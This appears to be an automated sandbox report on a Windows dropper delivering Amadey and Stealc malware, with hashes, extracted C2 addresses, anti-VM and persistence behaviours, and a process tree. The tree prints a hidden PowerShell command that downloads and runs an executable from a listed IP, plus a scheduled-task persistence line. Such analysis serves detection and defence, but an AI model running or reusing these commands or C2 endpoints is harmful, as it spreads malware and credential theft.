Analysis
-
max time kernel
143s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-01-2025 17:05
Static task
static1
Behavioral task
behavioral1
Sample
180d32fa82e18910ab7953ee8202c8cb38a2671fc775b3cbc7445e5ac392fc64.exe
Resource
win10v2004-20241007-en
General
-
Target
180d32fa82e18910ab7953ee8202c8cb38a2671fc775b3cbc7445e5ac392fc64.exe
-
Size
5.5MB
-
MD5
d65609b5dd8771d3de27c04edcf90fcf
-
SHA1
916e6a9036e4d8a37a39ca214a104849f23fe7b3
-
SHA256
180d32fa82e18910ab7953ee8202c8cb38a2671fc775b3cbc7445e5ac392fc64
-
SHA512
680d93afcf65ad0d443c8e05eb9c27bc5a875b666dadda8b67dabb11279558c66ebc0e1cee4901486ea86c080a29585a16639ba0157fb8dd2ab1d1c86dacaedb
-
SSDEEP
98304:yjYsx7o3/dtEZkwgSZ8qFlvjp+7LRaG6pg6uDX379RFQwVSq/cmQbPYtSs7VUfbD:yjYsx7kzu8qFVp4sRSn7zVSq0mQb+Sse
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
stealc
brat
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Signatures
-
Amadey family
-
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3X01O.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1I15d5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2b4233.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 52 3924 powershell.exe -
pid Process 4872 powershell.exe 3024 powershell.exe 1536 powershell.exe 3924 powershell.exe -
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3X01O.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2b4233.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3X01O.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1I15d5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1I15d5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2b4233.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation 1I15d5.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation 4T666U.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 10 IoCs
pid Process 2216 j8j98.exe 3808 D1I65.exe 3872 1I15d5.exe 2848 skotes.exe 3116 2b4233.exe 3516 3X01O.exe 3168 skotes.exe 740 4T666U.exe 2300 skotes.exe 4620 skotes.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine 1I15d5.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine 2b4233.exe Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine 3X01O.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 180d32fa82e18910ab7953ee8202c8cb38a2671fc775b3cbc7445e5ac392fc64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" j8j98.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" D1I65.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 3872 1I15d5.exe 2848 skotes.exe 3116 2b4233.exe 3516 3X01O.exe 3168 skotes.exe 2300 skotes.exe 4620 skotes.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 1I15d5.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 4632 3516 WerFault.exe 87 -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4T666U.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 180d32fa82e18910ab7953ee8202c8cb38a2671fc775b3cbc7445e5ac392fc64.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language j8j98.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language D1I65.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1I15d5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2b4233.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3X01O.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 3X01O.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 3X01O.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1020 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4320 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 24 IoCs
pid Process 3872 1I15d5.exe 3872 1I15d5.exe 2848 skotes.exe 2848 skotes.exe 3116 2b4233.exe 3116 2b4233.exe 3516 3X01O.exe 3516 3X01O.exe 3168 skotes.exe 3168 skotes.exe 3516 3X01O.exe 3516 3X01O.exe 3024 powershell.exe 3024 powershell.exe 1536 powershell.exe 1536 powershell.exe 4872 powershell.exe 4872 powershell.exe 3924 powershell.exe 3924 powershell.exe 2300 skotes.exe 2300 skotes.exe 4620 skotes.exe 4620 skotes.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3024 powershell.exe Token: SeDebugPrivilege 1536 powershell.exe Token: SeDebugPrivilege 4872 powershell.exe Token: SeDebugPrivilege 3924 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3872 1I15d5.exe -
Suspicious use of WriteProcessMemory 43 IoCs
description pid Process procid_target PID 440 wrote to memory of 2216 440 180d32fa82e18910ab7953ee8202c8cb38a2671fc775b3cbc7445e5ac392fc64.exe 82 PID 440 wrote to memory of 2216 440 180d32fa82e18910ab7953ee8202c8cb38a2671fc775b3cbc7445e5ac392fc64.exe 82 PID 440 wrote to memory of 2216 440 180d32fa82e18910ab7953ee8202c8cb38a2671fc775b3cbc7445e5ac392fc64.exe 82 PID 2216 wrote to memory of 3808 2216 j8j98.exe 83 PID 2216 wrote to memory of 3808 2216 j8j98.exe 83 PID 2216 wrote to memory of 3808 2216 j8j98.exe 83 PID 3808 wrote to memory of 3872 3808 D1I65.exe 84 PID 3808 wrote to memory of 3872 3808 D1I65.exe 84 PID 3808 wrote to memory of 3872 3808 D1I65.exe 84 PID 3872 wrote to memory of 2848 3872 1I15d5.exe 85 PID 3872 wrote to memory of 2848 3872 1I15d5.exe 85 PID 3872 wrote to memory of 2848 3872 1I15d5.exe 85 PID 3808 wrote to memory of 3116 3808 D1I65.exe 86 PID 3808 wrote to memory of 3116 3808 D1I65.exe 86 PID 3808 wrote to memory of 3116 3808 D1I65.exe 86 PID 2216 wrote to memory of 3516 2216 j8j98.exe 87 PID 2216 wrote to memory of 3516 2216 j8j98.exe 87 PID 2216 wrote to memory of 3516 2216 j8j98.exe 87 PID 440 wrote to memory of 740 440 180d32fa82e18910ab7953ee8202c8cb38a2671fc775b3cbc7445e5ac392fc64.exe 100 PID 440 wrote to memory of 740 440 180d32fa82e18910ab7953ee8202c8cb38a2671fc775b3cbc7445e5ac392fc64.exe 100 PID 440 wrote to memory of 740 440 180d32fa82e18910ab7953ee8202c8cb38a2671fc775b3cbc7445e5ac392fc64.exe 100 PID 740 wrote to memory of 4920 740 4T666U.exe 101 PID 740 wrote to memory of 4920 740 4T666U.exe 101 PID 4920 wrote to memory of 1020 4920 cmd.exe 104 PID 4920 wrote to memory of 1020 4920 cmd.exe 104 PID 4920 wrote to memory of 3444 4920 cmd.exe 106 PID 4920 wrote to memory of 3444 4920 cmd.exe 106 PID 3444 wrote to memory of 3024 3444 cmd.exe 107 PID 3444 wrote to memory of 3024 3444 cmd.exe 107 PID 4920 wrote to memory of 4612 4920 cmd.exe 108 PID 4920 wrote to memory of 4612 4920 cmd.exe 108 PID 4612 wrote to memory of 1536 4612 cmd.exe 109 PID 4612 wrote to memory of 1536 4612 cmd.exe 109 PID 4920 wrote to memory of 1444 4920 cmd.exe 110 PID 4920 wrote to memory of 1444 4920 cmd.exe 110 PID 1444 wrote to memory of 4872 1444 cmd.exe 111 PID 1444 wrote to memory of 4872 1444 cmd.exe 111 PID 4920 wrote to memory of 4320 4920 cmd.exe 112 PID 4920 wrote to memory of 4320 4920 cmd.exe 112 PID 4920 wrote to memory of 1960 4920 cmd.exe 113 PID 4920 wrote to memory of 1960 4920 cmd.exe 113 PID 1960 wrote to memory of 3924 1960 mshta.exe 114 PID 1960 wrote to memory of 3924 1960 mshta.exe 114 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\180d32fa82e18910ab7953ee8202c8cb38a2671fc775b3cbc7445e5ac392fc64.exe"C:\Users\Admin\AppData\Local\Temp\180d32fa82e18910ab7953ee8202c8cb38a2671fc775b3cbc7445e5ac392fc64.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:440 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\j8j98.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\j8j98.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\D1I65.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\D1I65.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3808 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1I15d5.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1I15d5.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3872 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2848
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2b4233.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2b4233.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3116
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3X01O.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3X01O.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3516 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3516 -s 15764⤵
- Program crash
PID:4632
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4T666U.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4T666U.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CCC.tmp\CCD.tmp\CCE.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4T666U.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4920 -
C:\Windows\system32\timeout.exetimeout /t 24⤵
- Delays execution with timeout.exe
PID:1020
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"4⤵
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"4⤵
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1536
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"4⤵
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4872
-
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "axBbImatGIm" /tr "mshta \"C:\Temp\cLR6O1KUh.hta\"" /sc minute /mo 60 /ru "Admin" /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:4320
-
-
C:\Windows\system32\mshta.exemshta "C:\Temp\cLR6O1KUh.hta"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3924
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3168
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3516 -ip 35161⤵PID:2348
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2300
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4620
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
796B
MD5a59eb779137c2c4364c86d9e4838abc2
SHA17bc963e54c2aed1313d5ee4ab6a0d4904e02a664
SHA2562e50bd0045293c0e6939300956d3cbdabcf16634fcb72412f78f65eb9acc76bc
SHA512d847d279e1b006c045674b27129a49aa7c6f6591504b34777e09e690032a7407fca3ac9612f080802023a15dddd92a61eebe5e1b7ecf0b2113e611933ce74c6c
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD51f0f8c49b22409ca78499f5df1ce9456
SHA15300f7ed636959c8c8366418e891dbe49a3edba9
SHA256429128efcec165baf50a81021e610933e1020f5298d865f7b30daf370fb22014
SHA512ca976a7ab0ef4782c3003433e8d99d34d8060cb3a8790e787b56db1e207902b9dd15ecb6e76fecbd00f5e83a8add34329b25f86b90c62055f0d0d1de5607d2af
-
Filesize
1KB
MD5e89c193840c8fb53fc3de104b1c4b092
SHA18b41b6a392780e48cc33e673cf4412080c42981e
SHA256920b0533da0c372d9d48d36e09d752c369aec8f67c334e98940909bfcb6c0e6c
SHA512865667a22e741c738c62582f0f06ea4559bb63a1f0410065c6fb3da80667582697aba2e233e91068c02d9ab4fb5db282a681fe8234f4c77a5309b689a37ac3a2
-
Filesize
1KB
MD5df4d87b6845d3fddf6e659396aea0757
SHA1a636715074a17bb786eca83543fb685219f23f57
SHA2560ea4203b826c4795e76f169fb364d512d3b03426c1e82719c6ec3b3446187f70
SHA512df4d70ef157b2dafce200cea052f0509d821d14f5cbcf7704149275a3e863ed7bfcda8d7f91b5539aa899c902a5743d13bc01f07797f4b0b564cefff5c36b7c4
-
Filesize
2KB
MD518283422f83c1ac93981ad87b116aaaa
SHA1397308fcc63eef6bdccada1b6bd8ae5d37e81482
SHA2561573a145edf52b446401eea1fdeafcd48b6ecaf3f4bbb4a594a73b921ee02873
SHA5120892532063016e7603f5dec85fbbe3a2aff5c4d0d17079c41ec23640c95c53e27d4bb7f886b4ea79a797db4e9b805cb411996fb0a9c32e5efb1948775388c42e
-
Filesize
89KB
MD536cdee01adae03e90331bef05b55fa05
SHA1aeed979265331dc8e0d37baeb4334f19b37875c1
SHA256cf8b8ecdbd2dd6409bed0ca5a107263f6739dc9813c4b44b296d3e2ea46f7598
SHA51296c8ee91fbdffc8a230cc6ed73da077a3af02f6e55d7b91d1d88816dc5aa3f4577883acc7aa373ac419e5d163ab56dd4d02eff44cc030196675a3263b8e2b2d3
-
Filesize
5.4MB
MD5d978b5cc35429bb470ed69a79b56183b
SHA151d0099c1edba530104c6c875bc74a1d37b9db1c
SHA256a5b5c8c0adcf321f9f26cc4f4f157a6fd8c9f40d5395fd5d244a12da718710ff
SHA512a81a8cc595c7531cd3292d3e9b97c25f05d775e1c1c173e7f7057fc38d7088ca3e3cd742ad82aac8ed47bf12c253b26101207943fe5243dcb08cd865dd945ab0
-
Filesize
1.7MB
MD5d3ae60e5d411322af8ff06fcef297fb9
SHA1913f8689eb78816685c0e2d9f10d91e4ed7960e6
SHA25644e3feda65d57ca194d41fa2016231792806386c7c0e716adbdd08d61fa85c9b
SHA51262f79857c66cb8bef930dd76a73dea7465581c4bc9f361b3f32d85d2124278bc60f0f56af4724aa49f5c95dc6a3ffe67f4e65bc77fae80fea5df573a5e585429
-
Filesize
3.6MB
MD5b2d03df0a62a4d4612740ca9bb64afd5
SHA1bc1b5118784e5ec4a509f9794200b16f5c0d5aa9
SHA256429928574fcd8a0bf79aa2908c024d194ca29afc26be893bb8976846c3b5273e
SHA5127cad3caddbb07872ca858c9b7dad5d6af6c68a8765f119030e197a7048b1c07875d273da1386e822640e9bbe9d509b98a1dd589cd287fed52230ad147a154c0c
-
Filesize
1.8MB
MD5eb8cae5228531bdb21117aea03e7e177
SHA11cd0af440d79752a89a94a48365299d021bf20f4
SHA25649a980d0e53ad084a37e5cf5e0ecb82231e68e272b5b6056f4068db9c41f683d
SHA5122c6f0f03d09ad9cb45a6a0895353a6fd6c78d3a14a43d22ef55e634170443a09fc699b82978ec23d8021294ea0d9da3fd0c087a35f71e97ae85907734e9039fd
-
Filesize
3.1MB
MD5a244ddff3d11e4d662af6452473a10b9
SHA1fd149571f22046b4229efc5f29285d7bd8a7424b
SHA256b3ba793baf5c62f9e97289a8c98303c2b5bb957ce2bcb2bd42a73b2216fb4c02
SHA5129a53f82f09cc81cb184eeb53fef728656e1f28a5596b3dc52173afc39366bf1289fa0873da02372a232764ee91d98a4f91430c9804ded24678f57901ad899037
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82